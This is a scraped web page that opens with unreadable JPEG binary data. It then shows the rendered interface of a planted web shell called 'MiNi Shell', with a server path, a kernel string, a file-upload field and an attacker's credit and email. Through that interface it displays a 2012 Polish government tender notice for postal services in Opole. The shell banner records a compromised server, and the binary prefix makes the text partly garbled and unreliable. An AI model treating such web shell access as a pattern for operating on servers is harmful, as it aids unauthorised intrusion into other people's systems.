JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120329/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120329/98790-N-2012.html

<p class="kh_header"><b>Opole: Powszechne usługi pocztowe w obrocie krajowym i zagranicznym na potrzeby GDDKiA Oddział w Opolu, ul. Niedziałkowskiego 6 oraz usługi odbioru przesyłek z siedziby zamawiającego i dostarczenia lub zwrotu przesyłek do siedziby zamawiającego .</b><br>
<b>Numer ogłoszenia: 98790 - 2012; data zamieszczenia: 29.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział  w Opolu , ul. Niedziałkowskiego 6, 45-085 Opole, woj. opolskie, tel. 077 4016344; 4545505, 4016330, faks 077 4544468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opole.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Powszechne usługi pocztowe w obrocie krajowym i zagranicznym na potrzeby GDDKiA Oddział w Opolu, ul. Niedziałkowskiego 6 oraz usługi odbioru przesyłek z siedziby zamawiającego i dostarczenia lub zwrotu przesyłek do siedziby zamawiającego ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są Powszechne usługi pocztowe w obrocie krajowym i zagranicznym na potrzeby GDDKiA Oddział w Opole, ul. Niedziałkowskiego 6 oraz usługi odbioru przesyłek z siedziby zamawiającego i dostarczenia lub zwrotu przesyłek do siedziby zamawiającego.
2.	Usługi objęte zamówieniem maja być realizowane sukcesywnie oraz w ilościach zależnych od potrzeb Zamawiającego na warunkach określonych w umowie oraz zgodnie z przepisami: 
-	Prawo zamówień publicznych ( Dz. U. 2010  Nr 113, poz. 759, ze zm.),
-	Prawo pocztowe (Dz. U. 2008 Nr 189 poz. 1159, ze zm.),
-	Rozporządzenie Ministra Infrastruktury z dnia 9 stycznia 2004 r. w spawie warunków  
   	wykonywania powszechnych usług pocztowych (Dz. U. Nr 5, poz. 34 z późn. zm.),
-	Rozporządzenie Ministra Infrastruktury z dnia 13 października 2003 r. w sprawie reklamacji powszechnej usługi pocztowej w zakresie przesyłki rejestrowanej 
i przekazu pocztowego ( Dz. U. Nr 183, poz. 1795 z poźn. zm.),
-	międzynarodowe przepisy pocztowe: ratyfikowana umowa międzynarodowa ogłoszona w dniu 5 października 2004 r.(Dz. U. z 2007 r.  Nr 206, poz. 1494),  Regulamin Poczty listowej   ( Dz. U. Nr 108, poz. 744), Regulamin dotyczący paczek  pocztowych ( Dz. U. z 2007 r.  Nr 108 poz. 745).
-	Ustawa z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (tj. Dz. U. z 2000 r. Nr 98, poz. 1071 z późn. zm.)
-	Inne uregulowania np. regulamin wewnętrzny o ile zapisy tych uregulowań nie są sprzeczne z powyższymi przepisami .

3.	Rodzaje przesyłek - zgodne z formularzem cenowym. W przypadku nadawania przez Zamawiającego przesyłek nie ujętych w formularzu cenowym, postawą rozliczeń będą ceny podane w Cenniku świadczenia usług pocztowych Wykonawcy, który będzie stanowił załącznik do oferty i umowy, w takim przypadku ceny z załącznika nie podlegają zmianie w okresie obowiązywania umowy.
4.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
5.	Punkt odbioru oraz dostarczenia przesyłek - siedziba Zamawiającego:
a)	Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Opolu, 
ul. Niedziałkowskiego 6 , 45-085 Opole
 
6. Opis czynności 
1. Przedmiotem zamówienia jest świadczenie powszechnych usług pocztowych
w obrocie krajowym i zagranicznym, w zakresie przyjmowania, przemieszczania
i doręczania przesyłek pocztowych o wadze powyżej 50g oraz ich ewentualnych zwrotów,
w rozumieniu ustawy Prawo Pocztowe  j.w.

2. Zamawiający powierza, a Wykonawca przyjmuje do wykonania usługę polegającą na
przyjęciu, przemieszczeniu i doręczeniu, a w razie niemożności doręczenia do zwrotu
Zamawiającemu przesyłek o wadze powyżej 50g, w kraju i zagranicą, w rozumieniu
ustawy Prawo Pocztowe  j.w.

3. Przez przesyłki pocztowe, będące przedmiotem zamówienia rozumie się przesyłki listowe
do 2000 g (Gabaryt A i B):
a) zwykłe - przesyłka nie rejestrowana nie będąca przesyłką najszybszej kategorii,
b) zwykłe priorytetowe - przesyłka nie rejestrowana listowa najszybszej kategorii,
c) polecone - przesyłka rejestrowana będąca przesyłką listową, przemieszczaną
i doręczaną w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub
uszkodzeniem,
d) polecone priorytetowe - przesyłka rejestrowana najszybszej kategorii,
e) polecone ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka przyjęta za
potwierdzeniem nadania i doręczona za pokwitowaniem odbioru,
f) polecone priorytetowe ze zwrotnym poświadczeniem odbioru (ZPO) - przesyłka
najszybszej kategorii przyjęta za potwierdzeniem nadania i doręczona za
pokwitowaniem odbioru,
g) z zadeklarowaną wartością - przesyłka rejestrowana, za której utratę, ubytek
zawartości lub uszkodzenie operator ponosi odpowiedzialność do wysokości wartości
przesyłki podanej przez nadawcę.
Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Opolu, 45-085  Opole, , ul. Niedziałkowskiego 6

Gabaryt A - to przesyłka o wymiarach:
minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
maksimum - żaden z wymiarów nie może przekroczyć wysokości 20 mm, szerokość
230mm, długość 325 mm .

Gabaryt B -  to przesyłka o wymiarach:
minimum - jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość
325 mm lub szerokość 230 mm,
maksimum - suma długości, szerokości i wysokości nie może być większa niż 900 mm,
przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.

4. Przez paczki pocztowe, będące przedmiotem zamówienia rozumie się paczki pocztowe
do 15 000 g(Gabaryt A i B)::
a) zwykłe - paczki rejestrowane nie będące paczkami najszybszej kategorii
b) priorytetowe - paczki rejestrowane najszybszej kategorii,
c) pobraniowe - paczki rejestrowane nie będące paczkami najszybszej kategorii
( za pobraniem opłaty),
d) z zadeklarowaną wartością - przesyłki rejestrowane nie będące przesyłkami
najszybszej kategorii z zadeklarowaną wartością,
e) ze zwrotnym poświadczeniem odbioru (ZPO),						        5. przesyłka na warunkach szczególnych - traktowanie jej ze szczególną ostrożnością.

Gabaryt A - to przesyłka o wymiarach:
minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
maksimum - żaden z wymiarów nie może przekroczyć długości 600 mm, szerokość
500 mm, wysokość 300 mm.
Gabaryt B
minimum - jeśli choć jeden z wymiarów przekracza długość 600 mm , szerokość 500 mm,
wysokość  300 mm,
maksimum - suma długości i największego obwodu w innym kierunku niż długość nie
może być większa 3000 mm, przy czym największy wymiar nie może przekroczyć
1500 mm.

5. Wykonawca zobowiązany jest do odbioru  przesyłek przygotowanych
do wyekspediowania, z Sekretariatu Generalnej Dyrekcji Dróg Krajowych i Autostrad,
zlokalizowanej w siedzibie Zamawiającego w Opolu przy ul. Niedziałkowskiego 6, od
poniedziałku do piątku w godzinach między 15oo-16oo. Odbioru przesyłek
dokonywać będzie upoważniony przedstawiciel Wykonawcy po okazaniu stosownego
upoważnienia. Odbiór przesyłek przygotowanych do wyekspediowania będzie
każdorazowo dokumentowany przez Wykonawcę pieczęcią, podpisem i datą w pocztowej
książce nadawczej (dla przesyłek rejestrowanych) oraz na zestawieniu ilościowym
przesyłek wg poszczególnych kategorii wagowych (dla przesyłek zwykłych).

6. Zamawiający zobowiązuje się do umieszczenia na przesyłce listowej lub paczce nazwy
odbiorcy wraz z jego adresem (podany jednocześnie w pocztowej książce nadawczej),
określając rodzaj przesyłki (zwykła, polecona, priorytet czy ze zwrotnym
poświadczeniem odbioru - ZPO) oraz umieszczania na stronie adresowej każdej
nadawanej przesyłki nadruku (pieczątki) określającej pełną nazwę i adres Zamawiającego jak i oznaczenia potwierdzającego wniesienie opłaty za usługę o treści uzgodnionej z Wykonawcą .

7. Zamawiający zobowiązuje się do właściwego przygotowania przesyłek oraz sporządzenia
zestawień dla przesyłek.

8. Zamawiający zobowiązuje się do nadawania przesyłek w stanie uporządkowanym, przez
co należy rozumieć:

a) dla przesyłek rejestrowanych - wpisanie każdej przesyłki do pocztowej książki
nadawczej w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla
Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego
potwierdzenie nadania danej partii przesyłek,

b) dla przesyłek zwykłych - zestawienie ilościowe przesyłek wg poszczególnych
kategorii wagowych sporządzone dla celów rozliczeniowych w dwóch egzemplarzach,
z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych,
a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii
przesyłek.

9. Zamawiający jest odpowiedzialny za nadawanie przesyłek listowych i paczek w stanie
umożliwiającym Wykonawcy doręczenie bez ubytku i uszkodzenia do miejsca zgodnie
z adresem przeznaczenia.

10. Zamawiający ma prawo zlecić usługę innemu operatorowi, a kosztami realizacji obciążyć Wykonawcę, jeżeli Wykonawca nie odbierze od Zamawiającego przesyłek
w wyznaczonym dniu i czasie.

11. Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio
zabezpieczona (zaklejona lub zalakowana). Opakowanie paczki powinno stanowić
zabezpieczenie przed dostępem do zawartości oraz aby uniemożliwiało uszkodzenie
przesyłki w czasie przemieszczania.

12. Nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich
odbioru przez Wykonawcę od Zamawiającego.

13. Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata
potwierdzenie odbioru niezwłocznie po dokonaniu doręczenia przesyłki, nie później
jednak, niż w ciągu 7 dni roboczych od dnia doręczenia.

14. W przypadku nieobecności adresata, przedstawiciel Wykonawcy pozostawia
zawiadomienie (pierwsze awizo) o próbie dostarczenia przesyłki ze wskazaniem gdzie
i kiedy adresat może odebrać list lub przesyłkę. Termin do odbioru przesyłki przez
adresata wynosi 14 dni roboczych liczonych od dnia następnego po dniu pozostawienia
pierwszego awizo, w tym terminie przesyłka jest awizowana dwukrotnie. Po upływie
terminu odbioru, przesyłka zwracana jest Zamawiającemu wraz z podaniem przyczyny nie
odebrania przez adresata.

15. Szczegółowe warunki realizacji usług objętych zamówieniem określone są w istotnych
postanowieniach umowy.
 
16. Zamówienie będzie realizowane przez okres 24 miesięcy rozpoczynając od następnego dnia po  podpisaniu Umowy lub do wyczerpania maksymalnej oferowanej ceny ofertowej brutto ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 50%, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.10.00.00-7, 64.11.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości : 2.500 PLN ( słownie złotych: dwa tysiące pięćset złotych 00/100 ) . Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy : a) pieniądzu, przelewem na rachunek bankowy: w Banku Gospodarstwa Krajowego nr 46 1130 1219 0026 3102 9720 0005 , b) poręczeniach bankowych ; c) poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych ; d) gwarancjach bankowych; e) gwarancjach ubezpieczeniowych; f) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2007 , Nr 42, poz. 275 ze zm. )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówień polegających na świadczeniu usług pocztowych porównywalnych z przedmiotem zamówienia o wartości min. 125 tys. zł łącznie. Jako porównywalne zadanie Zamawiający uznaje zadanie polegające na świadczeniu usług pocztowych obejmujących przesyłki listowe (dokumentowe) oraz paczki, polegających na przyjmowaniu, przekazywaniu do przewozu i doręczaniu nadawanych przesyłek listownych oraz doręczaniu do Zamawiającego zwróconych przesyłek pocztowych. UWAGA : Wartości podane w dokumentach w walutach innych niż wskazane powyżej Wykonawca przeliczy wg według średniego kursu NBP na dzień podpisania protokołu odbioru robót lub innego równoważnego dokumentu .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w zależności od zasobu): 1) pisemne zobowiązanie tych podmiotów do zrealizowania lub udziału w realizacji części/całości zamówienia, zawierające zakres czynności które te podmioty zobowiązują się wykonać -w przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z SIWZ (TOM II Istotne dla stron postanowienia umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl/486/zamowienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Opolu , ul. Niedziałkowskiego 6 , 45-085 Opole - pok. 307 - 308 ( III piętro )..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 10:50, miejsce: Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Opolu , ul. Niedziałkowskiego 6 , 45-085 Opole - pok. 101 ( sekretariat - I piętro ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminie: 24 miesięcy od następnego dnia po podpisaniu umowy lub do wyczerpania maksymalnej oferowanej kwoty wynagrodzenia. 2) Zamówienie jest przewidziane do finansowania ze środków krajowych będących w dyspozycji Generalnego Dyrektora Dróg Krajowych i Autostrad oraz w części ze środków przeznaczonych w ramach Pomocy Technicznej Programu Operacyjnego Infrastruktura i Środowisko (POIiŚ) będących w dyspozycji Generalnego Dyrektora Dróg Krajowych i Autostrad. Nr referencyjny GDDKiA-O/Op-R-2/23-417-05/12..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com